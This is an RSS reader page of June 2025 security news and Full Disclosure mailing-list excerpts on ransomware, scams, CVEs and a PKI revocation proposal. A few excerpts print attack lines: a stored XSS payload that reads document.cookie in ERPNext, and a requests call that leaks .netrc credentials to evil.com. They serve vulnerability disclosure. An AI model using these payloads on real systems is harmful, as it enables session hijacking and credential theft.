FreshRSS

Today — June 5th 2025 Your RSS feeds

What to Do If You Book a Hotel or Airbnb and It Turns Out to Be a Scam

Summer vacation season is upon us, and millions of families are booking accommodations for their dream getaways. But with the surge in travel bookings comes an unfortunate reality: accommodation scams are on the rise, and they’re becoming increasingly sophisticated. As a cybersecurity professional, I’ve seen how devastating these scams can be—not just financially, but emotionally, when your family vacation turns into a nightmare.

The good news? With the right knowledge and proactive measures, you can protect yourself and your family from these predators. Even better, if you do fall victim to a scam, there are specific steps you can take to minimize the damage and potentially recover your losses.

The Harsh Reality: Travel Scams Are Exploding

Travel accommodation fraud has skyrocketed in recent years. Scammers have become expert at creating convincing fake listings on legitimate platforms like Airbnb and Booking.com, and even at building entirely fraudulent websites that mimic well-known hotel chains. They steal photos from real properties, craft compelling descriptions, and even create fake reviews to lure unsuspecting travelers.

What makes these scams particularly insidious is the emotional investment. You’re planning a special family vacation, perhaps saving for months, and the excitement of finding what seems like the “perfect” place clouds your judgment. Scammers exploit this vulnerability ruthlessly.

Red Flags: How to Spot a Scam Before You Book

I can tell you that prevention is always your best defense. Here are the warning signs that should make you pause before clicking “book now”:

Price Red Flags:

  • Prices are significantly below market rate for the area
  • Requests for payment outside the platform (via wire transfer, gift cards, or cryptocurrency)
  • Demands for large upfront payments or full payment before arrival
  • No clear cancellation policy or unreasonably strict terms

Property Red Flags:

  • Limited or professional-looking photos that seem too perfect
  • No street address provided, only general area descriptions
  • Lack of recent reviews or reviews that seem fake (overly generic language)
  • No contact information for the property beyond the initial booking contact

Booking Site Red Flags:

  • Websites with recent domain registration dates
  • No secure payment processing (look for “https” and padlock icons)
  • Missing contact information, terms of service, or privacy policies
  • Unprofessional website design or broken links

Immediate Action Steps If You Discover a Scam

If you’ve fallen victim to an accommodation scam, time is critical. Here’s what you need to do immediately:

Step 1: Document Everything (First 24 Hours)

  • Screenshot all communications, listings, confirmation emails, and payment receipts
  • Save any photos or descriptions from the original listing
  • Note exact dates, times, and methods of all communications
  • Create a detailed timeline of events

Step 2: Contact Your Financial Institution (Immediately)

  • Call your credit card company or bank to report the fraudulent charge
  • Request a chargeback or dispute the transaction
  • Ask to have your card frozen if you suspect further unauthorized access
  • Credit cards generally offer better fraud protection than debit cards

Step 3: Report to the Platform (Within 24-48 Hours)

  • Contact the booking platform’s customer service immediately
  • Provide all documentation you’ve gathered
  • Follow their specific fraud reporting procedures
  • Keep detailed records of all customer service interactions

Step 4: File Official Reports (Within 72 Hours)

  • Report to the Federal Trade Commission (FTC) at ReportFraud.ftc.gov
  • File a complaint with the Internet Crime Complaint Center (IC3.gov)
  • Contact local law enforcement if substantial money is involved
  • Report to your state’s attorney general’s office

Step 5: Monitor Your Accounts and Identity

  • Check all bank and credit card statements for unauthorized charges
  • Review your credit reports for any suspicious activity
  • Change passwords for any accounts that might have been compromised
  • Set up fraud alerts with credit bureaus

Long-Term Recovery and Protection Strategies

Beyond immediate damage control, you need to think about long-term protection for you and your family. This is where comprehensive digital protection becomes crucial.

How McAfee Can Protect Your Family from Travel Scams

One of the most effective ways to protect your family from travel scams and other online threats is to implement comprehensive digital protection. Solutions like McAfee’s family protection plans offer multiple layers of security that work together to keep scammers at bay.

Modern family protection services provide several key features that directly combat travel scams:

Real-Time Scam Protection: Advanced scam detection technology automatically identifies and blocks fraudulent websites, phishing emails, and suspicious links before you interact with them. This means if you accidentally click on a fake booking site, the protection software will warn you before you enter any personal information.

Secure VPN for Travel Research: When researching accommodations on public Wi-Fi networks (like those in airports or coffee shops), a VPN encrypts your connection, preventing scammers from intercepting your personal information or redirecting you to fake websites.

Financial Transaction Monitoring: Comprehensive protection plans monitor your bank accounts and credit cards for unusual activity, sending immediate alerts if suspicious transactions occur. This early warning system can help you catch fraudulent charges within hours rather than weeks.

Identity Monitoring and Dark Web Surveillance: These services continuously scan the dark web and other sources where stolen personal information is traded, alerting you if your data appears in places it shouldn’t. This is particularly valuable since accommodation scammers often sell stolen personal information to other criminals.

Personal Data Cleanup: Many protection services help identify and remove your personal information from data broker sites that scammers often use to research potential victims and make their approaches more convincing.

For families, comprehensive protection plans typically cover up to six family members, providing each person with their own monitoring and protection while giving parents oversight of their children’s online activities. With identity theft coverage up to $2 million per family and 24/7 restoration assistance, these services provide both prevention and recovery support.

The Bottom Line: Protection Is Worth the Investment

Twenty years in cybersecurity has taught me that the cost of prevention is always less than the cost of recovery. Whether it’s taking time to properly research accommodations, investing in comprehensive family protection software, or educating your family about scam tactics, these upfront investments pay dividends in peace of mind and financial security.

Travel scams prey on our excitement and trust during what should be joyful family times. By staying vigilant, using proper protection tools, and knowing how to respond quickly if something goes wrong, you can ensure your family’s summer vacation memories are made for all the right reasons.

Remember: legitimate accommodation providers want to build trust and will readily provide verification. If anyone pressures you to skip verification steps or pay through unusual methods, walk away. Your family’s safety and financial security are worth more than any “deal” that seems too good to be true.

Safe travels, and remember—the best vacation is one where the only surprises are pleasant ones.

The post What to Do If You Book a Hotel or Airbnb and It Turns Out to Be a Scam appeared first on McAfee Blog.

Play ransomware crims exploit SimpleHelp flaw in double-extortion schemes

Recompiled binaries and phone threats used to boost the pressure

Groups linked with the Play ransomware have exploited more than 900 organizations, the FBI said Wednesday, and have developed a number of new techniques in their double-extortion campaigns - including exploiting a security flaw in remote-access tool SimpleHelp if orgs haven't patched it.…

Yesterday — June 4th 2025 Your RSS feeds

ICE Quietly Scales Back Rules for Courthouse Raids

A requirement that ICE agents ensure courthouse arrests don’t clash with state and local laws has been rescinded by the agency. ICE declined to explain what that means for future enforcement.

Ukraine strikes Russian bomber-maker with hack attack

Drones are not enough

Following a daring drone attack on Russian airfields, Ukrainian military intelligence has reportedly also hacked the servers of Tupolev, the Kremlin's strategic bomber maker.…

Ransomware scum leak patient data after disrupting chemo treatments at Kettering

Literally adding insult to injury

Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online.…

Qualcomm patches three exploited security flaws, but you could still be vulnerable

Device manufacturers must still apply the critical updates to their individual products, but we're not out of the woods yet.

Google Exposes Vishing Group UNC6040 Targeting Salesforce with Fake Data Loader App

Google has disclosed details of a financially motivated threat cluster that it said "specialises" in voice phishing (aka vishing) campaigns designed to breach organizations' Salesforce instances for large-scale data theft and subsequent extortion. The tech giant's threat intelligence team is tracking the activity under the moniker UNC6040, which it said exhibits characteristics that align with

Fake IT support calls hit 20 orgs, end in stolen Salesforce data and extortion, Google warns

Victims include hospitality, retail and education sectors

A group of financially motivated cyberscammers who specialize in Scattered-Spider-like fake IT support phone calls managed to trick employees at about 20 organizations into installing a modified version of Salesforce's Data Loader that allows the crims to steal sensitive data.…

Crims stole 40,000 people's data from our network, admits publisher Lee Enterprises

Did somebody say ransomware? Not the newspaper group, not even to deny it

Regional newspaper publisher Lee Enterprises says data belonging to around 40,000 people was stolen during an attack on its network earlier this year.…

Chaos RAT Malware Targets Windows and Linux via Fake Network Tool Downloads

Threat hunters are calling attention to a new variant of a remote access trojan (RAT) called Chaos RAT that has been used in recent attacks targeting Windows and Linux systems. According to findings from Acronis, the malware artifact may have been distributed by tricking victims into downloading a network troubleshooting utility for Linux environments. "Chaos RAT is an open-source RAT written in

Your SaaS Data Isn't Safe: Why Traditional DLP Solutions Fail in the Browser Era

Traditional data leakage prevention (DLP) tools aren't keeping pace with the realities of how modern businesses use SaaS applications. Companies today rely heavily on SaaS platforms like Google Workspace, Salesforce, Slack, and generative AI tools, significantly altering the way sensitive information is handled. In these environments, data rarely appears as traditional files or crosses networks

The Race to Build Trump’s ‘Golden Dome’ Missile Defense System Is On

President Donald Trump has proposed building a massive antimissile system in space that could enrich Elon Musk if it materializes. But experts say the project’s feasibility remains unclear.

Malicious PyPI, npm, and Ruby Packages Exposed in Ongoing Open-Source Supply Chain Attacks

Several malicious packages have been uncovered across the npm, Python, and Ruby package repositories that drain funds from cryptocurrency wallets, erase entire codebases after installation, and exfiltrate Telegram API tokens, once again demonstrating the variety of supply chain threats lurking in open-source ecosystems. The findings come from multiple reports published by Checkmarx,

You're Not Ready

Seems bad out there. Unfortunately, it can always get worse. From evil hacker AI to world-changing cyberattacks, WIRED envisions the future you haven't prepared for.

Deepfake Scams Are Distorting Reality Itself

The easy access that scammers have to sophisticated AI tools means everything from emails to video calls can’t be trusted.

The US Grid Attack Looming on the Horizon

A major cyberattack on the US electrical grid has long worried security experts. Such an attack wouldn’t be easy. But if an adversary pulled it off, it’d be lights out in more ways than one.

The Texting Network for the End of the World

Everyone knows what it’s like to lose cell service. A burgeoning open source project called Meshtastic is filling the gap for when you’re in the middle of nowhere—or when disaster strikes.

See How Much Faster a Quantum Computer Will Crack Encryption

A quantum computer will likely one day be able to break the encryption protecting the world's secrets. See how much faster such a machine could decrypt a password compared to a present-day supercomputer.

A GPS Blackout Would Shut Down the World

GPS jamming and spoofing attacks are on the rise. If the global navigation system the US relies on were to go down entirely, it would send the world into unprecedented chaos.

The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare

In the very near future, victory will belong to the savvy blackhat hacker who uses AI to generate code at scale.

UK CyberEM Command to spearhead new era of armed conflict

Government details latest initiative following announcement last week

Revealing more details about the Cyber and Electromagnetic (CyberEM) military domain, the UK's Ministry of Defence (MoD) says "there are pockets of excellence" but improvements must be made to ensure the country's capability meets the needs of national defense.…

Ukraine war spurred infosec vet Mikko Hyppönen to pivot to drones

Why? There's a war in Europe, Finland has a belligerent neighbor, and cyber is a settled field

Interview Mikko Hyppönen has spent the last 34 years creating security software that defends against criminals and state-backed actors, but now he's moving onto drone warfare.…

HPE Issues Security Patch for StoreOnce Bug Allowing Remote Authentication Bypass

Hewlett Packard Enterprise (HPE) has released security updates to address as many as eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. "These vulnerabilities could be remotely exploited to allow remote code execution, disclosure of information, server-side request forgery, authentication bypass,

‘Deliberate attack’ deletes shopping app’s AWS and GitHub resources

CEO of India's KiranaPro, which brings convenience stores online, vows to name the perp

The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator.…

Meta pauses mobile port tracking tech on Android after researchers cry foul

Zuckercorp and Yandex used localhost loophole to tie browser data to app users, say boffins

Security researchers say Meta and Yandex used native Android apps to listen on localhost ports, allowing them to link web browsing data to user identities and bypass typical privacy protections.…

You say Cozy Bear, I say Midnight Blizzard, Voodoo Bear, APT29 …

Microsoft, CrowdStrike, and pals promise clarity on cybercrew naming, deliver alias salad instead

Opinion Microsoft and CrowdStrike made a lot of noise on Monday about teaming up with other threat-intel outfits to "bring clarity to threat-actor naming."…

Before yesterday Your RSS feeds

[RFC Draft] Built mathematical solution for PKI's 'impossible' problem. Response time: months→2 hours. IETF interest level: ¯\_(ツ)_/¯

TL;DR: Built a mathematical solution that cuts CA compromise response time from months to 2 hours. Just submitted to IETF. Watch them discuss it for 10+ years while dozens more DigiNotars happen.

The Problem That Keeps Me Up At Night

Working on a DNS-Security project, I realized something absolutely bonkers:

Nuclear power plants have SCRAM buttons. Airplanes have emergency procedures. The global PKI that secures the entire internet? Nope. If a Root CA gets pwned, we basically call everyone manually and hope for the best.

This problem has existed for 25+ years - since X.509 PKI was deployed in the 1990s. Every security expert knows it. Nobody fixed it.

When DigiNotar got hacked in 2011:

  • 3 months undetected (June → August)
  • Manual coordination with every browser vendor
  • 22 days for major browser updates
  • FOREVER for embedded systems
  • 531 fraudulent certificates. 300,000+ Iranian users monitored.

The Mathematical Paradox Everyone Gave Up On

Here's why nobody solved this:

"You can't revoke a trusted Root CA certificate, because it is self-signed by the CA and therefore there is no trusted mechanism by which to verify a CRL." - Stack Overflow PKI experts

The fundamental issue: Root CAs are trusted a priori - there's no higher authority to revoke them. If attackers compromise the private key, any "revocation CRL" would be signed by that same compromised key. Who do you trust?

For SubCAs: Manual coordination between Root CA and SubCA operators takes weeks while the compromise spreads through the hierarchy.

The PKI community literally accepted this as "architecturally impossible to solve." For 25 years.

My "Wait, What If..." Moment

But what if we make attackers help us solve their own paradox?

What if we design the system so that using the compromised key aggressively eventually triggers the CA's unavoidable suicide?

The Solution: RTO-Extension (Root-TurnOff Extension)

Fun fact: I originally wanted to call this the T800-Extension (Terminator-style "self-termination"), but I figured that would just cause trademark trouble. So for now it's the RTO-Extension aka RTO-CRL aka Root-TurnOff CRL - technically correct and legally safe! 🤖

I call it Certificate Authority Self-Revocation. Here's the elegant part:

  1. Root CAs AND SubCAs embed encrypted "monitoring URL" in their certificates (RTO-Extension)
  2. Extension gets inherited down the CA hierarchy
  3. Each CA level has independent automated monitoring every 6 hours
  4. Emergency signal triggers human verification at ANY level
  5. Manual authorization generates "Root-TurnOff CRL" (RTO-CRL) for that specific CA
  6. Compromised CA dies, clean CAs keep working
  7. Distributed defense: Every CA in the hierarchy can self-destruct independently!

The Beautiful Math:

  • Traditional: Root CA Compromise = Architecturally impossible to revoke
  • RTO-Extension: Root CA Compromise = Self-Limiting Attack
  • Distributed Defense: Each CA level = Independent immune system

I solved the "unsolvable" problem: Attackers can compromise a CA, but using it aggressively triggers that CA's mathematically unavoidable RTO-CRL suicide while other CAs remain operational.

Technical Implementation

Just submitted draft-jahnke-ca-self-revocation-04 to IETF:

RTO-Extension Structure:

  • AES-256-GCM encrypted monitoring URL
  • HKDF-SHA384 key derivation
  • EdDSA emergency signal authentication
  • Dual-person authorization required
  • Mathematical impossibility of RTO-CRL forgery

Emergency Timeline:

  • 0-15min: Automated detection
  • 15-45min: Human verification
  • 45-60min: Dual-person authorization
  • 1-2h: Root-TurnOff CRL distribution complete

Maximum exposure: 2 hours vs current 2+ months

Security Analysis

Threat Scenarios:

Attacker without CA key:

  • Cannot forge RTO-CRL (Root-TurnOff CRL)
  • Cannot bypass human authorization
  • No additional attack surface

Attacker with CA key:

  • Can issue fraudulent certificates (existing problem)
  • But aggressive use risks triggering that CA's RTO-CRL suicide
  • Other CAs in hierarchy remain operational
  • Attack becomes self-limiting with surgical precision

Game Theory:

Attackers face impossible economics:

  • Aggressive exploitation → Detection → RTO-CRL Self-termination
  • Conservative exploitation → Low ROI → Why bother?

Why This Fixes Everything

Current PKI Disasters:

  • DigiNotar: 3+ months uncontrolled
  • Symantec: Multi-year industry disruption
  • Manual CA revocation: Weeks of coordination between CA operators
  • Next incident: Same manual clusterfuck

With RTO-Extension:

  • Any compromised CA: 2-hour max exposure instead of months
  • Surgical containment: Only affected CA dies via RTO-CRL, others keep working
  • Distributed resilience: Defense in depth at every hierarchy level
  • Mathematical termination guarantee: Attackers trigger their own RTO-CRL destruction

The Insane IETF Paradox

Here's what pisses me off:

  • CVE Critical Patch: 48-hour global deployment
  • Architectural Security Improvement: 10+ years of committee discussions

The system is optimized for reacting to disasters instead of preventing them entirely.

Implementation Reality

Costs:

  • RTO-Extension emergency infrastructure: ~$85K per CA
  • Historical PKI disasters: $2-7 billion+ in global economic damage
  • DigiNotar bankruptcy: $50M+ direct losses
  • Symantec distrust: Forced certificate replacement for millions of websites
  • ROI: 50,000%+

Deployment:

  • Backward compatible (legacy CAs unaffected)
  • Optional RTO-Extension implementation (no forced upgrades)
  • Immediate benefits for early adopters

The Full Technical Specification

For the technical details, I've submitted the complete specification to the IETF as draft-jahnke-ca-self-revocation-04. It includes:

  • Complete ASN.1 definitions for the RTO-Extension certificate extension
  • Cryptographic protocol specifications (AES-256-GCM, HKDF-SHA384, EdDSA)
  • Operational procedures for emergency RTO-CRL response
  • Security analysis covering all threat models
  • Implementation examples (OpenSSL configuration, monitoring service code)
  • Deployment timeline and backwards compatibility strategy

The mathematical proof is solid: attackers with CA private keys can either use them conservatively (low impact) or aggressively (triggering RTO-CRL self-termination). Either way, the attack becomes economically unattractive and time-limited.

The Real Question

Every PKI expert reading this knows the Root CA revocation problem is real and "architecturally impossible." My RTO-Extension mathematical solution is elegant, implementable, and desperately needed.

So why will this take 10+ years to standardize while the next CA compromise gets patched in 2 days?

Because fixing symptoms gets panic-priority, but solving "impossible" architectural problems gets committee-priority.

The system is optimized for reacting to disasters instead of preventing them entirely.

What You Can Do

  • Read the spec: draft-jahnke-ca-self-revocation-04
  • PKI operators: DM me about RTO-Extension pilot testing
  • Security researchers: Please break my RTO-CRL math
  • IETF folks: Push this to LAMPS working group
  • Everyone: Upvote until IETF notices

Final Thought

We've been accepting months-long CA compromise windows as "just how PKI works."

It doesn't have to be this way.

The RTO-Extension math is sound. The implementation is ready. The only missing piece is urgency.

How many more DigiNotars before we solve the "unsolvable" problem?

EDIT: Holy shit, front page! Thanks for the gold!

For everyone asking "why didn't [big company] build this" - excellent question. My theory: they profit more from selling incident response than preventing incidents entirely.

EDIT 2: Yes, I know about Certificate Transparency. CT is detection after damage. The RTO-Extension is prevention before damage. Different problems.

EDIT 3: To the person who said "just use short-lived certificates" - sure, let me call every embedded device manufacturer and ask them to implement automatic renewal. I'll wait.

Currently building the RTO-Extension into the keweonDNS project. If you want to see a PKI with an actual emergency stop button, stay tuned.

Special thanks to my forum users at XDA-Developers - without you, this fundamental flaw would have never been spotted. Your sharp eyes and relentless questioning made this discovery possible!



Google quietly pushes emergency fix for Chrome 0-day as exploit runs wild

TAG team spotted the V8 bug first, so you can bet nation-states weren’t far behind

Google revealed Monday that it had quietly deployed a configuration change last week to block active exploitation of a Chrome zero-day.…

X's new 'encrypted' XChat feature seems no more secure than the failure that came before it

Musk's 'Bitcoin-style encryption' claim has experts scratching their heads

Elon Musk's X social media platform is rolling out a new version of its direct messaging feature that the platform owner said had a "whole new architecture," but as with many a Muskian proclamation, there's reason to doubt what's been said. …

Crooks fleece The North Face accounts with recycled logins

Outdoorsy brand blames credential stuffing

Joining the long queue of retailers dealing with cyber mishaps is outdoorsy fashion brand The North Face, which says crooks broke into some customer accounts using login creds pinched from breaches elsewhere.…

How the Farm Industry Spied on Animal Rights Activists and Pushed the FBI to Treat Them as Bioterrorists

For years, a powerful farm industry group served up information on activists to the FBI. Records reveal a decade-long effort to see the animal rights movement labeled a “bioterrorism” threat.

Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack

Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign. "

Defense in depth -- the Microsoft way (part 89): user group policies don't deserve tamper protection

Posted by Stefan Kanthak on Jun 03

Hi @ll,

user group policies are stored in DACL-protected registry keys
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies]
respectively [HKEY_CURRENT_USER\Software\Policies] and below, where
only the SYSTEM account and members of the "Administrators" user group
are granted write access.

At logon the user's registry hive "%USERPROFILE%\ntuser.dat" is loaded
with exclusive (read, write and...

CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP Project v1.0

Posted by Sanjay Singh on Jun 03

Hello Full Disclosure list,

I am sharing details of a newly assigned CVE affecting an open-source
educational software project:

------------------------------------------------------------------------
CVE-2025-45542: Time-Based Blind SQL Injection in CloudClassroom PHP
Project v1.0
------------------------------------------------------------------------

Product: CloudClassroom PHP Project
Vendor:...

Microsoft patches the patch that put Windows 11 in a coma

Out-of-band is becoming the norm rather than the exception

Microsoft is patching another patch that dumped some PCs into recovery mode with an unhelpful error code.…

ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

Posted by Ron E on Jun 03

An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}

ERPNext v15.53.1 Stored XSS in user_image Field Allows Script Execution via Injected Image Path

Posted by Ron E on Jun 03

An authenticated user can inject malicious JavaScript into the user_image
field of the profile page using an XSS payload within the file path or HTML
context. This field is rendered without sufficient sanitization, allowing
stored script execution in the context of other authenticated users.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--...

Local information disclosure in apport and systemd-coredump

Posted by Qualys Security Advisory via Fulldisclosure on Jun 03

Qualys Security Advisory

Local information disclosure in apport and systemd-coredump
(CVE-2025-5054 and CVE-2025-4598)

========================================================================
Contents
========================================================================

Summary
Mitigation
Local information disclosure in apport (CVE-2025-5054)
- Background
- Analysis
- Proof of concept
Local information disclosure in systemd-coredump...

Stored XSS via File Upload - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS via File Upload #1:

Steps to Reproduce:

1. Login with low privilege user and visit "Profile" > "Edit Your Profile"

2. Click on "Choose File" and upload the following file

html-xss.html

<!DOCTYPE html>...

IDOR "Change Password" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

IDOR "Change Password" Functionality #1:

Steps to Reproduce:

1. Login as user with low privilege and visit profile page
2. Select "Edit Your Profile" and click "Submit"
3. Trap the HTTP POST request
4. Set...

Stored XSS "Send Message" Functionality - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS "Send Message" Functionality #1:

Steps to Reproduce:

1. Login as normal user and visit "Profile" > "Message" > "Send Message"
2. In "Message" field enter the...

Authenticated File Upload to RCE - adaptcmsv3.0.3

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3
# Date: 06/2025
# Exploit Author: Andrey Stoykov
# Version: 3.0.3
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Authenticated File Upload to RCE #1:

Steps to Reproduce:

1. Login as admin user and visit "System" > "Appearance" > "Themes" >
"Default" > "Theme Files" and choose "Add New File"...

Stored XSS in "Description" Functionality - cubecartv6.5.9

Posted by Andrey Stoykov on Jun 03

# Exploit Title: Stored XSS in "Description" Functionality - cubecartv6.5.9
# Date: 05/2025
# Exploit Author: Andrey Stoykov
# Version: 6.5.9
# Tested on: Debian 12
# Blog: https://msecureltd.blogspot.com/

Stored XSS #1:

Steps to Reproduce:

1. Visit "Account" > "Address Book" and choose "Edit"
2. In the "Description" parameter enter the following payload...

Multiple Vulnerabilities in SAP GuiXT Scripting

Posted by Michał Majchrowicz via Fulldisclosure on Jun 03

Security Advisory

Vulnerabilities reported to vendor: March 13, 2025
Vendor requested additional information: March 20, 2025
Additional information provided to vendor: March 22, 2025
Vendor confirmed the reported issues but rejected them: March 31, 2025
Additional information provided to vendor: May 6, 2025
Vendor confirmed the reported issues but rejected them: May 15, 2025
Vendor closed the tickets for all reported issues: May 16, 2025
Public...

Critical 10-Year-Old Roundcube Webmail Bug Allows Authenticated Users Run Malicious Code

Cybersecurity researchers have disclosed details of a critical security flaw in the Roundcube webmail software that has gone unnoticed for a decade and could be exploited to take over susceptible systems and execute arbitrary code. The vulnerability, tracked as CVE-2025-49113, carries a CVSS score of 9.9 out of 10.0. It has been described as a case of post-authenticated remote code execution via

Wyze's new Bulb Cam turns any light socket into a 2K camera - for just $50

The new Wyze Bulb Cam replaces light bulbs and offers extra security coverage built into a motion-activated smart light.

CVE-2024-47081: Netrc credential leak in PSF requests library

Posted by Juho Forsén via Fulldisclosure on Jun 03

The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.

Issuing the following API call triggers the vulnerability:

requests.get('http://example.com:@evil.com/')

Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.

The root cause is...

Exploit CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin (<= 3.5.2)

Posted by Housma mardini on Jun 03

Hi,

I am submitting an exploit for *CVE-2019-9978*, a remote code execution
vulnerability in the Social Warfare WordPress plugin (version <= 3.5.2).

*Exploit Title*: CVE-2019-9978: Remote Code Execution in Social Warfare
WordPress Plugin (<= 3.5.2)

*Date*: 2025-05-20

*Exploit Author*: Huseyin Mardinli

*Vendor Homepage*: https://warfareplugins.com/

*Software Link*: https://wordpress.org/plugins/social-warfare/

*Version*: <= 3.5.2...

Youpot honeypot

Posted by Jacek Lipkowski via Fulldisclosure on Jun 03

Hi,

I made a novel honeypot for worms called Youpot.

Normally a honeypot will try to implement whatever service it thinks the
attacker would like. For a high interaction or pure honeypot this is often
impossible, because of the thousands of possibilities. Even a simple
telnet server will have thousands of variants: different banners,
different shells, different default passwords, on different IoT devices
etc.

Youpot works around this by...

Don’t let dormant accounts become a doorway for cybercriminals

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

Illicit crypto-miners pouncing on lazy DevOps configs that leave clouds vulnerable

To stop the JINX-0132 gang behind these attacks, pay attention to HashiCorp, Docker, and Gitea security settings

Up to a quarter of all cloud users are at risk of having their computing resources stolen and used to illicitly mine for cryptocurrency, after crims cooked up a campaign that targets publicly accessible DevOps tools.…

Scattered Spider: Understanding Help Desk Scams and How to Defend Your Organization

In the wake of high-profile attacks on UK retailers Marks & Spencer and Co-op, Scattered Spider has been all over the media, with coverage spilling over into the mainstream news due to the severity of the disruption caused — currently looking like hundreds of millions in lost profits for M&S alone.  This coverage is extremely valuable for the cybersecurity community as it raises

Bling slinger Cartier tells customers to be wary of phishing attacks after intrusion

Nothing terribly valuable taken in data heist, though privacy a little tarnished

Global jewelry giant Cartier is writing to customers to confirm their data was exposed to cybercriminals that broke into its systems.…

Android Trojan Crocodilus Now Active in 8 Countries, Targeting Banks and Crypto Wallets

A growing number of malicious campaigns have leveraged a recently discovered Android banking trojan called Crocodilus to target users in Europe and South America. The malware, according to a new report published by ThreatFabric, has also adopted improved obfuscation techniques to hinder analysis and detection, and includes the ability to create new contacts in the victim's contacts list. "Recent

Google Chrome to Distrust Two Certificate Authorities Over Compliance and Conduct Issues

Google has revealed that it will no longer trust digital certificates issued by Chunghwa Telecom and Netlock citing "patterns of concerning behavior observed over the past year." The changes are expected to be introduced in Chrome 139, which is scheduled for public release in early August 2025. The current major version is 137.  The update will affect all Transport Layer Security (TLS)